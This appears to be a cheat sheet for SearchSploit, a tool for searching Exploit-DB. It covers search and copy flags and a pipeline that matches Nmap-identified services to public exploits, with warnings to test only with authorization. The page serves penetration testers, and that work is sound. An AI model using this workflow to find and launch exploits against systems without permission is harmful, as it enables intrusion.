SearchSploit Cheat Sheet
Command-line search of Exploit-DB for public exploits, shellcode, and papers by keyword or CVE.
Overview
SearchSploit queries a local copy of Exploit-DB archives. Use after service/version identification (Nmap, Nessus, manual) to find proof-of-concept exploits—then validate in lab and use only with authorization.
Authorized testing only. Running exploits against systems without permission is illegal. PoCs may be unreliable or destructive—test in isolated lab first.
Install
sudo apt install -y exploitdbsearchsploit -u # update local databasesearchsploit -hEssential commands
Keyword search
searchsploit apache 2.4Exact title match
searchsploit -t "WordPress 6.4"CVE search
searchsploit CVE-2021-44228Exclude terms
searchsploit linux kernel --exclude "(PoC)|dos"Common workflows
Copy exploit to working directory —
searchsploit -m 50383ls -la 50383.*Examine without copying —
searchsploit -x 50383JSON for scripting —
searchsploit apache tomcat --json | jq .Mirror path and online lookup —
searchsploit -p 50383Nmap version grep pipeline —
grep -i "open" nmap.gnmap | awk '{print $2,$3}' | while read port svc; dosearchsploit "$svc" | head -5doneFlags reference
-u | Update Exploit-DB archive |
|---|---|
-m | Mirror exploit files to cwd |
-x | Examine exploit (pager) |
-p | Show full path |
-t | Title search only |
-e | EDITOR (examine) |
-j / --json | JSON output |
-w | Web links (exploit-db.com) |
-c | Case-sensitive |
--exclude | Exclude terms (` |
--cve | CVE-specific shorthand |
Tips
- Run searchsploit -u at engagement start; stale DB misses recent CVEs.
- -m copies code—review for backdoors, hardcoded IPs, and safety before execution.
- Cross-reference with vendor advisories and Metasploit search cve:.
- “DOS” exploits rarely add report value—filter with --exclude dos.